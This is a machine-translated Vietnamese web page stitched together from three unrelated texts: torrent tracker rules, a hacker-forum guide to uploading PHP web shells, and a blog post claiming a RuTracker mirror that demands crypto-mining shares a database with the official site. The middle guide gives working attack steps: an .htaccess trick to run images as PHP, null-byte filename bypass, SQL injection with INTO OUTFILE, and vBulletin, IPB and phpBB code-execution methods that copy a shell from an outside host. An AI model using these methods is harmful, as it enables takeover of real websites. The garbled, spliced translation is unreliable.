Chế độ php hồ sơ không phô trương. Phương pháp làm đầy vỏ

Các quy tắc và hạn chế trên trình theo dõi.

1. Các quy định chung và hạn chế
1.1. Các quy tắc theo dõi này là không thể thương lượng và phải được mọi người có mặt trên trình theo dõi tuân theo vô điều kiện. Chỉ Quản trị viên Tracker mới được phép không tuân thủ một số quy định của quy tắc trong các trường hợp đặc biệt.
1.2. Cơ quan quản lý trình theo dõi là cơ quan có thẩm quyền cao nhất và duy nhất có thể giải quyết mọi tình huống xung đột liên quan đến trình theo dõi và người dùng của nó. Vì vậy, quyết định của Quản trị viên là quyết định cuối cùng và không thể kháng cáo.
1.3. Ban quản trị Tracker có quyền thay đổi và bổ sung tất cả các điều khoản của các quy tắc này mà không cần thông báo trước hoặc sau đó. Việc bổ sung và thay đổi các quy tắc có hiệu lực kể từ thời điểm được công bố. Tuy nhiên, như một hành động thiện chí, Ban quản trị sẽ cố gắng, bất cứ khi nào có thể, thu hút sự chú ý của người dùng về những thay đổi đó.
1.4. Việc thiếu hiểu biết về những điều này và các Quy tắc theo dõi khác không những không làm giảm nhẹ trách nhiệm của một người khi vi phạm chúng mà bản thân nó còn là một hành vi vi phạm và là một tình tiết tăng nặng.
1.5. Nghiêm cấm sử dụng bất kỳ chương trình nào để làm sai lệch dữ liệu về Tải lên và Tải xuống của bạn. Những kẻ gian lận sẽ bị cấm ngay lập tức.
1.7. Nghiêm cấm sử dụng các lỗi, sai sót của trình theo dõi cho mục đích cá nhân. Trường hợp phát hiện trục trặc, sai sót phải thông báo cho Ban quản trị Tracker.
2. Đăng ký
Đăng ký là một phần không thể thiếu trong quá trình theo dõi. Việc đăng ký tự động thể hiện sự đồng ý của bạn với các Quy tắc này. Nếu bạn không đồng ý với các Quy tắc này, hãy viết thư cho chính quyền.
2.1. CẤM ĐĂNG KÝ TỪ CÁC MÁY CHỦ PROXY NƯỚC NGOÀI. Người vi phạm - cấm ngay lập tức!!!
Trong trường hợp đặc biệt, nó chỉ được phép sau khi chính quyền xem xét đơn đăng ký.
2.2. CẤM ĐĂNG KÝ NHIỀU HƠN HAI TÀI KHOẢN TỪ MỘT MÁY TÍNH. Trong trường hợp vi phạm, tất cả các tài khoản hiện có đều bị cấm.
Chỉ có thể đăng ký một tài khoản mới sau hai tài khoản hiện có khi có sự đồng ý của chính quyền.
3. Quy tắc nhận xét bài
3.1. Việc sử dụng ngôn từ tục tĩu trong các bình luận để phân phối, bất kỳ từ ngữ và cách diễn đạt tục tĩu nào, những lời tục tĩu được che đậy, kể cả bằng tiếng nước ngoài, đều bị cấm.
Hình phạt: Xóa những bình luận vi phạm nội quy và cấm viết bình luận trong thời gian 1 tuần. Khi vi phạm tiếp theo của quy tắc này, cấm trong thời gian 7 ngày và cấm viết bình luận trong thời gian 14 ngày. Trong tương lai, sẽ có lệnh cấm vĩnh viễn việc viết bình luận.
3.2. Nghiêm cấm xúc phạm người tham gia theo dõi dưới mọi hình thức. Nghiêm cấm thể hiện bất kỳ hành vi thô lỗ, lăng mạ cá nhân và phát ngôn tục tĩu đối với những người tham gia khác, làm tổn hại đến danh tiếng của họ, hạ nhục danh dự và nhân phẩm của họ, bao gồm cả việc làm rõ công khai các mối quan hệ cá nhân, như trong tin nhắn cá nhân trên trình theo dõi và trong các nhận xét về bản phân phối. Những người tham gia phải duy trì sự giao tiếp tôn trọng.
Hình phạt: Xóa các bình luận vi phạm quy tắc và cấm người vi phạm trong thời gian 7 ngày. Vi phạm quy tắc này sau đó sẽ bị cấm trong 7 ngày và cấm viết bình luận trong 30 ngày. Trong tương lai, sẽ có lệnh cấm vĩnh viễn việc viết bình luận.
3.3. Các mối đe dọa dưới bất kỳ hình thức nào đều bị cấm (mối đe dọa ảo, thực và các mối đe dọa khác đối với người tham gia theo dõi).
Hình phạt: Xóa tin nhắn và cấm người vi phạm trong 14 ngày. Nếu quy tắc này bị vi phạm một lần nữa, bạn sẽ bị cấm trong một tháng.
3.4. Đốt lửa (tin nhắn lạc đề, nhằm mục đích gây tranh chấp, cũng như cá nhân hóa những người đang thảo luận), tràn ngập (tin nhắn không tương ứng với chủ đề, không mang tải ngữ nghĩa hoặc chỉ bao gồm các biểu tượng cảm xúc), lạc đề (các tin nhắn không liên quan đến chủ đề đang thảo luận) đều bị cấm, cũng như các động cơ gây lũ lụt, đốt lửa, lạc đề và các tin nhắn như: “Trợ giúp”, “Vấn đề”, “Bạn đang nói về cái gì vậy, hả?” hoặc “Tôi không hiểu - tải xuống từ đâu?” và những thứ tương tự, không liên quan đến việc phân phối này. Một bình luận có thể chứa không quá 3 biểu tượng cảm xúc.
Hình phạt: Xóa những bình luận vi phạm nội quy và cảnh cáo người viết bình luận trong thời gian 3 ngày. Nếu quy tắc này bị vi phạm một lần nữa, tác giả bình luận sẽ bị cấm viết bình luận trong thời gian 7 ngày. Trong tương lai, đối với mỗi hành vi vi phạm, lệnh cấm để lại bình luận sẽ được ban hành trong thời gian 14 ngày và cấm tải xuống trong thời gian 14 ngày.
3.5. Nghiêm cấm đăng tin nhắn thương mại, quảng cáo trực tiếp hoặc gián tiếp, gửi thư rác và liên kết đến các trang web không liên quan trực tiếp đến việc phân phối trong các bình luận.
Hình phạt: Xóa quảng cáo, cấm viết bình luận trong thời gian 7 ngày và cấm tải xuống trong thời gian 7 ngày. Trường hợp vi phạm nhiều lần sẽ bị cấm viết bình luận trong thời gian 15 ngày và cấm tải xuống trong thời gian 15 ngày. Trong tương lai sẽ có lệnh cấm vĩnh viễn việc viết bình luận.
3.6. Nghiêm cấm bình luận thể hiện sự thù địch về chủng tộc, quốc gia và tôn giáo, kích động các đảng phái chính trị, thúc đẩy khủng bố, chủ nghĩa cực đoan, ma túy, tôn giáo và các chủ đề khác không phù hợp với các luật đạo đức và lễ nghi được chấp nhận chung.
Hình phạt: Xóa các bình luận vi phạm nội quy, cấm viết bình luận trong thời gian 14 ngày và cấm tải xuống trong thời gian 14 ngày. Trường hợp vi phạm nhiều lần sẽ bị cấm viết bình luận trong thời gian 30 ngày và cấm tải xuống trong thời gian 30 ngày. Trong tương lai sẽ có lệnh cấm vĩnh viễn việc viết bình luận.
3.7. Nghiêm cấm để lại những bình luận vi phạm một cách công khai hoặc ngấm ngầm Bộ luật Hình sự của Liên bang Nga, cũng như các tin nhắn kêu gọi thực hiện các hành động bất hợp pháp.
Hình phạt: Xóa tin nhắn, cấm viết bình luận trong thời gian 14 ngày và cấm tải xuống trong thời gian 14 ngày. Trường hợp vi phạm nhiều lần sẽ bị cấm hoạt động trong thời gian 30 ngày. Đối với vi phạm thứ ba - lệnh cấm vĩnh viễn.
3.8. Trong các bình luận để phân phối, việc tiết lộ bất kỳ dữ liệu cá nhân nào của người dùng, dữ liệu bí mật, tên đầy đủ, xuất bản ảnh, phổ biến thông tin về đời sống riêng tư của người tham gia thảo luận là bí mật cá nhân hoặc gia đình của người đó mà không có sự đồng ý của người đó đều bị cấm.
Hình phạt: Xóa các bình luận vi phạm quy tắc và cảnh cáo bằng lời nói cho người theo dõi. Trường hợp vi phạm nhiều lần sẽ bị cấm viết bình luận trong thời gian 7 ngày. Trong tương lai, sẽ có lệnh cấm viết bình luận trong thời gian 30 ngày.
3.9. Nghiêm cấm đăng trong phần bình luận những hình ảnh có nội dung khiêu dâm, cảnh bạo lực hoặc bất kỳ hình ảnh nào khác nhằm hạ nhục hoặc xúc phạm người dùng khác.
Hình phạt: Xóa bình luận vi phạm nội quy và cấm tải xuống và để lại bình luận trong thời gian 7 ngày. Trong trường hợp vi phạm nhiều lần, người dùng sẽ bị cấm trong thời gian 7 ngày. Trong tương lai - cấm viết bình luận trong thời gian 15 ngày và cấm viết bình luận vĩnh viễn.
3.10. Nghiêm cấm sử dụng ngôn ngữ không phải tiếng Nga và phông chữ không phải là chữ Cyrillic trong các bình luận.
Hình phạt: Xóa tin nhắn và cảnh cáo bằng lời nói cho người dùng; trong trường hợp vi phạm nhiều lần các quy tắc của đoạn này, cấm viết bình luận trong thời gian 3 ngày.
3.11. Bị cấm sử dụng trong tin nhắn phương pháp sau đây xả: màu đỏ, hơn 75% chữ in hoa và phông chữ size lớn- Đây là đặc quyền của người điều hành và quản trị viên.
Hình phạt: Xóa tin nhắn và cảnh cáo bằng lời nói cho người dùng; trong trường hợp vi phạm nhiều lần các quy tắc của đoạn này, cấm viết bình luận trong thời gian 7 ngày.
3.12. Nghiêm cấm trích dẫn quá mức (trích dẫn tin nhắn của những người tham gia khác với số lượng vượt quá mức hợp lý (hơn 10 dòng của tin nhắn gốc)).
Hình phạt: Chỉnh sửa tin nhắn và cảnh cáo người dùng bằng lời nói; trong trường hợp vi phạm nhiều lần các quy tắc của đoạn này, cấm viết bình luận trong thời gian 3 ngày.
3.13. Không được phép tiết lộ nội dung và vui lòng không sử dụng nội dung tiết lộ (tiết lộ những điểm chính cốt truyện, hiểu biết về nó có thể làm hỏng trải nghiệm xem của người khác, kết quả của trận đấu, v.v.).
Nếu không thể không có phần tiết lộ nội dung thì bạn phải đưa phần tiết lộ nội dung đó vào thẻ [mở rộng] và đặt dấu “Spoiler” ở phía trước nó.
Lưu ý: Trong các bản phân phối “thể thao”, không được phép tiết lộ tối đa 11 bình luận (1 trang).
Hình phạt: Chỉnh sửa tin nhắn và cảnh cáo bằng lời nói cho người dùng. Nếu bạn nhiều lần vi phạm các quy định của đoạn này, bạn sẽ bị cấm viết bình luận trong thời gian 3 ngày.
3.14. Nghiêm cấm xuất bản các tin nhắn chứa thông tin sai lệch có chủ ý.
Hình phạt: Xóa các bình luận vi phạm quy tắc và cảnh cáo bằng lời nói cho người dùng. Nếu bạn nhiều lần vi phạm các quy định của đoạn này, bạn sẽ bị cấm để lại bình luận trong thời gian 7 ngày.
Hệ thống bình luận torrent được thiết kế để:
- Thể hiện sự tôn trọng và biết ơn đối với người tặng,
- Hỏi một câu hỏi cụ thể mà bạn quan tâm về việc phân phối,
- Báo cáo thông tin thú vị, liên quan đến việc phân phối
4. Hạn chế về avatar và chữ ký:
4.1. Chữ ký:
- Chiều cao tối đa: 100 pts (hay nói cách khác là không quá 4 thanh userbar hoặc 10 dòng văn bản (cỡ chữ 10); chiều rộng: 750 pts.
- Tổng dung lượng hình ảnh có trong chữ ký không được vượt quá 200 Kb.
- Nội dung: bạo lực, đe dọa (trên cơ sở nhân khẩu học, quốc gia, tôn giáo hoặc chính trị), ngôn ngữ tục tĩu (thô tục, gọi tên, thô lỗ, v.v.), đồi trụy (khiêu dâm), phân biệt đối xử dưới mọi hình thức, văn bản và hình ảnh quảng cáo hoặc tính chất thương mại là không thể chấp nhận được, việc bắt chước các tiêu đề/cấp bậc của tài nguyên này cũng như các hình ảnh khiêu khích, bao gồm cả. sử dụng các biểu tượng của Đức Quốc xã.
- Hoạt ảnh: cấm chú thích chớp mắt mạnh (mức độ chớp mắt do chính quyền quyết định).
- Chữ ký dưới tin nhắn của bạn không thể được sử dụng để tạo liên kết đến bất kỳ tài nguyên mạng nào. (ngoại lệ là các liên kết đến các trang web có thanh người dùng, các dịch vụ như youtube, google, v.v.)
4.2. Hình đại diện:
- Kích thước tối đa: 100x100 pixel; trọng lượng: lên tới 21 KB.
- Nội dung: bạo lực, đe dọa (trên cơ sở nhân khẩu học, quốc gia, tôn giáo hoặc chính trị), ngôn ngữ tục tĩu (thô tục, gọi tên, thô lỗ, v.v.), đồi trụy (khiêu dâm), phân biệt đối xử dưới mọi hình thức, tuyên truyền ma túy, quảng cáo thương mại và văn bản quảng cáo, bắt chước các chức danh/cấp bậc của tài nguyên này, cố tình làm giống với hình đại diện của các thành viên quản trị, cũng như các hình ảnh khiêu khích, bao gồm cả. sử dụng các biểu tượng của Đức Quốc xã.
- Hoạt hình: cấm hình đại diện nhấp nháy mạnh (mức độ nhấp nháy do chính quyền quyết định).
Hình phạt: Xóa chữ ký và hình đại diện hoặc cấm sử dụng (do quản trị viên quyết định).
5. Phát hành
5.1. Nghiêm cấm tải lại các bản phát hành lên các trình theo dõi khác mà không có sự cho phép cá nhân của người phát hành. Hỗ trợ việc phân phối một bản phát hành bị cấm tải lên lại trên một trình theo dõi khác tương đương với việc tải lên lại độc lập và bị phạt theo quy định tại khoản 7.
6. Khác
6.1. Nghiêm cấm tải lên nội dung phân phối bằng các dịch vụ lưu trữ tệp như vip-file, letitbit và các dịch vụ khác...
6.2. Nghiêm cấm sử dụng bất kỳ trình quản lý tải xuống nào để tải xuống torrent.
7. Hình phạt:
Đối với các vi phạm quy định tại đoạn 5-6 - lệnh cấm trong 7 ngày. Vi phạm nhiều lần các quy tắc này sẽ dẫn đến lệnh cấm suốt đời.

Xin chào %username% và các bạn của anh ấy. Chà, bạn cần tải shell lên trang web gấp, à, bạn không bao giờ biết được, có thể khoản phí cuối cùng phụ thuộc vào nó. Chà, nó không thành công đâu. Ở đây tôi đã thu thập được một số ví dụ (cảm ơn Tracy và những người khác về điều này).

Hãy đổ vỏ qua hình ảnh

Bạn đã hack một trang web (tất nhiên là bạn chỉ đang thử nghiệm) bằng bảng quản trị tùy chỉnh... Và bạn không thể tải lên web shell mà chỉ tải lên các hình ảnh và chỉ tải các định dạng .jpg, .gif, .png.
Có thể làm gì trong trường hợp này?

Chúng tôi chuyển shell có phần mở rộng .gif vào một số thư mục có hình ảnh và tạo tệp .htaccess có nội dung

Ứng dụng AddType/x-httpd-php .gif
Lệnh này sẽ thực thi định dạng .gif dưới dạng php
Đang cố mở /shell.gif

Ngoài ra, nếu tập lệnh không quan tâm đến việc ngắt dòng, chúng tôi sẽ cố gắng làm tràn shell, đồng thời đổi tên nó thành shell.php%00.jpg, hãy kiểm tra tính khả dụng của shell.php, nếu như vậy thì sao?

Phương pháp tải shell qua mysql.user từ tiếng rên rỉ

1) Hãy cùng tìm hiểu xem chúng ta đang ngồi dưới quyền ai và cũng tìm hiểu các quyền của anh ta đối với mysql.

site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Hãy tìm xem chúng ta đang ngồi dưới ai)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user=" người dùng của chúng tôi "+--+
(Hãy kiểm tra các đặc quyền của người dùng của chúng tôi. Nếu nó báo lỗi trong quá trình xuất, bạn có thể hex người dùng của chúng tôi 0x)
3) site.com/index.php?id=-1+union+select+1,"",3+from+mysql.user+into+outfile+" Đường dẫn đến tập tin "+--+
(Điền vào vỏ nhỏ)
tái bút
Để mọi thứ hoạt động, bạn cần có quyền ghi và biết đường dẫn đầy đủ đến thư mục gốc.
Bạn cũng có thể kiểm tra quyền ghi như thế này:

site.com/index.php?id=1+and+1=0+union+Select+1," prava ",3+from+mysql.user+--+
Nếu prava được hiển thị thì bạn có quyền.

Tình huống sau đây. Chúng tôi đang ở trong bảng quản trị của công cụ diễn đàn vBulletin

Đi nào:
Plugin & Sản phẩm -> Trình quản lý plugin -> Plugin & Sản phẩm -> Trình quản lý plugin -> [Thêm plugin mới]

Chọn mẫu. Thông thường chúng tôi chọn faq_complete, chọn và nhấp vào hộp kiểm Plugin đang hoạt động, đặt thành “Có” và lưu.

localhost/diễn đàn/faq.php?cmd=phpinfo();

Nếu chúng ta đã in phpinfo() thì hãy xem xét shell trong tay chúng ta.

Tiếp theo trong phpinfo bạn cần tìm đường dẫn đầy đủ tới diễn đàn (ví dụ /home/u0000/site.ru/www/sell.php). Tiếp theo chúng ta cần biến web shell của mình thành tập tin txt và tải nó lên bất kỳ trang web nào
mysite.com/shell.txt
Điền vào shell bằng lệnh

localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Đội này làm gì? Nó sao chép nội dung của biến [a] sang biến [b], tức là shell.txt được sao chép sang shell.php

Đang tải shell vào IPB 3

Đi nào:
Hỗ trợ->Quản lý SQL->Quy trình đang chạy->Chạy truy vấn mới

Mã số:
chọn 0x3c3f706870696e666f28293b3f3e vào outfile "Z:/home/site.ru/www/uploads/shell.php"
Bạn có thể thấy đường dẫn đầy đủ như thế này:

Quản trị->Hỗ trợ
Sẽ có một phiên bản PHP được viết ở trên cùng và một liên kết đến PHPINFO ở bên trái.

Vỏ ở đây:
http://site.com/uploads/shell.php

Tải shell lên phpBB 2

1. Tạo tệp ex.sql
2. Đăng ký tại đó

CẬP NHẬT phpbb_users THIẾT LẬP user_sig_bbcode_uid="(.+)/e\0", user_sig="phpbb:eval(stripslashes($_GET[e]));" Ở ĐÂU user_id=2;
Trong đó user_id=2 là ID quản trị viên

3. Vào bảng quản trị
4. Trong bảng quản trị, chọn mục “Khôi phục DB” và tải xuống ex.sql
5. Thực thi code/ Điền vào shell như thế này

Đi nào:
http://target/profile.php?mode=editprofile&e=phpinfo();
Sau đó:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/ site.ru/www/sell.php
Để hiển thị phpinfo() bạn cần phải đăng nhập.

Đây chỉ là danh sách ngắn về cách thức và loại động cơ có thể nạp vỏ. Cần thêm nữa? Chào mừng đến với những người ở rdot
đang tải lên diễn đàn
điền vào cms
Và đây là chiếc shell yêu thích của tôi, cũng trên rdot))

Tôi đã viết rằng khi bạn cố gắng đăng nhập vào một trong các máy nhân bản RuTracker, bạn sẽ nhận được một thông báo cho biết rằng điều này chỉ có thể thực hiện được nếu bạn cho phép trang web thực hiện các phép tính trên máy tính của mình, hay nói cách khác là khai thác tiền điện tử.

Sau đó, tôi nhận được những tin nhắn giận dữ trong phần bình luận rằng tôi thực sự là một kẻ ngốc và những chiếc gương mà tôi đang mô tả không thuộc về trình theo dõi gốc và không hề được kết nối với chính trình theo dõi gốc. Tôi không coi trọng điều này lắm và trong phần bình luận cho ghi chú đó, tôi đã đặt câu hỏi, nhưng thực tế là chiếc gương thì sao? rutracker-org.appspot.com lặp lại không chỉ thiết kế của trang web chính thức của rutracker rutracker.org, nhưng cũng lặp lại hoàn toàn nội dung của nó. Tuy nhiên, để đáp lại điều này tôi nghe nói, tôi trích dẫn: " Bạn là một tên ngốc Volokh và bạn không hiểu gì cả".

Là một người tỉnh táo, anh ta bắt đầu nghĩ về những điều sau: Nếu họ bảo tôi là kẻ ngốc thì có lẽ đó là sự thật? Tôi cũng nghĩ vậy, nhưng hóa ra là không - trong tình huống này tôi không phải là kẻ ngốc. Nhưng điều đầu tiên trước tiên.

Sau khi quản trị viên RuTracker bắt đầu nói trong phần bình luận rằng:

Chúng tôi không có tấm gương hay “dự án con” nào khác! Tất cả các “bản sao” theo dõi gốc khác sao chép cấu trúc và thiết kế của chúng tôi đều không liên quan gì đến chúng tôi, việc sử dụng chúng có thể dẫn đến việc đánh cắp mật khẩu, sử dụng máy tính của bạn để khai thác tiền điện tử và các rắc rối khác! Maintracker cũng là hàng giả!!

Tôi bắt đầu nghĩ, có lẽ tôi đã thực sự quá khích và vu khống những kẻ ở RuTracker một cách vô ích. Được rồi, tôi quyết định so sánh các nhận xét từ trang web chính thức của RuTracker - rutracker.org và nhận xét từ tấm gương rutracker rutracker-org.appspot.com, đã yêu cầu quyền tạo tiền điện tử. Hóa ra các bình luận hoàn toàn giống nhau. Nhưng sẽ không ai tin tôi, tôi quyết định và muốn chụp ảnh màn hình. Nhưng ý tưởng này cũng có vẻ ngu ngốc, bởi vì... bình luận có thể dễ dàng bị xóa và chỉnh sửa.

Hầu hết ý tưởng tốt nhất bắt đầu quay video. Chúng ta hãy xem và sau đó tôi sẽ bình luận về những gì đang xảy ra ở đây:

Bạn đã nhìn chưa? Tôi sẽ nói ngay rằng tôi trình bày video “nguyên trạng”, tức là không chỉnh sửa. Vì vậy, nó không có bất kỳ bình luận hoặc lồng tiếng nào. Vì vậy, hãy tìm hiểu những gì đang xảy ra ở đây.

Để bắt đầu tôi đã tạo Hộp thưđể đăng ký trên trang web rutracker-org.appspot.com. Có, chính xác là trên trang web khai thác tiền điện tử. Tại sao trên đó mà không phải trên trang web chính thức? rutracker.org? Thực tế là tôi đã phải đối mặt với nhiệm vụ hiển thị những gì các trang web rutracker-org.appspot.comrutracker.org một cơ sở dữ liệu, tức là các trang này được kết nối với nhau, trái với tuyên bố của quản trị viên theo dõi gốc.

Sau khi mở thư, tôi mở Trình duyệt tor và tải ba tab:

1. Trang web chính thức rutracker.org;

2. Gương RuTracker rutracker-org.appspot.com;

3. Tab có hộp thư đang mở.

Sau đó, trên gương RuTracker rutracker-org.appspot.com Tôi đã đăng ký (Thời gian 00:25) và email kích hoạt tài khoản đã đến hộp thư của tôi (Thời gian 00:57). Và ở đây những điệu nhảy thú vị bắt đầu, hay đúng hơn là những điệu nhảy rùng rợn với việc đốt mông quản trị viên trang: mã kích hoạt chứa liên kết đến trang web chính thức của trình theo dõi (Thời gian 1:00):

https://rutracker.org/forum/profile.php?mode=activate&u=43055955&act_key=nUMiXqWX19EF

Liên kết này đang hoạt động và nó dẫn trực tiếp đến trang web chính thức rutracker.org. Bằng cách nhấp vào liên kết, tài khoản được tạo trên máy nhân bản rutracker-org.appspot.com kích hoạt thành công trên trang web chính thức rutracker.org(Thời gian 1:06). Đi vào sự kỳ diệu của công nghệ và những suy nghĩ kỳ diệu của người quản trị. Có vẻ như có điều gì đó đang bắt đầu ảnh hưởng đến các quản trị viên trang web. Được rồi, tôi là một kẻ ngốc, như họ đã nói, lấy đi những gì của tôi. Hãy tiếp tục.

Sau khi kích hoạt thành công tài khoản của tôi, tôi đi đến gương rutracker-org.appspot.com và cố gắng đăng nhập vào trang web (Thời gian 1:45). Sau khi nhập captcha, tôi đăng nhập thành công theo địa chỉ đã tạo tài khoản trên trình theo dõi "không chính thức" (Thời gian 2:03). Và đúng lúc này thông báo tương tự xuất hiện (Thời gian 2:07):

Tôi nhấp vào nút "Cho phép" (Thời gian 2:08) vì nếu không tôi sẽ không thể đăng nhập. Sau đó mình hiển thị tài khoản cá nhân trống và chưa để lại bình luận nào (Thời gian 2:20).

Bây giờ, để thể hiện mối quan hệ giữa mirror và trang web chính thức, tôi chọn phân phối ngẫu nhiên trên trang web rutracker-org.appspot.com và để lại bình luận (Thời gian 3:10). Sau đó, trên trang web chính thức rutracker.org Tôi cố gắng đăng nhập (Thời gian 3:40) bằng tài khoản được tạo trên máy nhân bản theo dõi gốc. Và lạ thay, thông tin đăng nhập và mật khẩu từ máy nhân bản “không chính thức” đã xuất hiện trên trang web chính thức (Thời gian 4:00). Sự trùng hợp ngẫu nhiên? Đừng nghĩ.

Hãy đi xa hơn, mở danh sách các tin nhắn còn lại trên trình theo dõi và những gì chúng ta thấy: một phân phối quen thuộc trong danh sách chủ đề (Thời gian 4:05). Có lẽ cũng là một sự trùng hợp ngẫu nhiên, và để có sức thuyết phục hơn, tôi mở bình luận mà tôi để lại về bản phân phối này trên một tấm gương mà quản trị viên không nhận ra (Thời gian 4:17).

So sánh nhận xét với phân phối từ trang web rutracker-org.appspot.comrutracker.org(Thời gian 5.54) và một lần nữa chúng tôi tin chắc rằng hai địa điểm này có mối liên hệ với nhau.

Quản trị viên trang web đã viết gì cho tôi? Có vẻ như họ đã thuyết phục tôi rằng trang web chính thức và nhân bản rutracker-org.appspot.com không được kết nối với nhau theo bất kỳ cách nào. Nhận xét của quản trị viên theo dõi nêu rõ rằng tất cả các bản sao chỉ đơn giản là sao chép cấu trúc và thiết kế của trang web, nhưng không được kết nối với nhau. Tuy nhiên, từ những gì chúng ta thấy, hóa ra trang web chính thức sao chép bình luận từ một tấm gương cánh tả nào đó? Không, điều đó cũng thật vớ vẩn. Đâu là sự thật? Sự thật là hai trang web này có một cơ sở dữ liệu và có nhiều bản sao, một số trong số đó được quản trị viên theo dõi nhận ra, trong khi một số khác không được công nhận và được sử dụng để tạo tiền điện tử.

Hóa ra suốt thời gian qua, trong các bình luận, họ đang cố đổ những điều vô nghĩa vào tai tôi và thuyết phục tôi rằng tôi được cho là đã truy cập một trang web hoàn toàn sai, nhưng thực tế thì hóa ra trang web này cũng thuộc về RuTracker.

Tôi nghi ngờ rằng bây giờ một số người sẽ bắt đầu bị viêm điểm thứ năm và sẽ bị tấn công bằng những lời đe dọa, lăng mạ, v.v. Nhưng tôi thực sự đã nghĩ rằng việc tấn công những kẻ đó là vô ích và họ không có lỗi gì cả. Hóa ra mọi chuyện hoàn toàn khác và video này là bằng chứng cho điều đó. Như một đồng nghiệp đã nói: RuTracker - bạn như một người anh trai đối với tôi.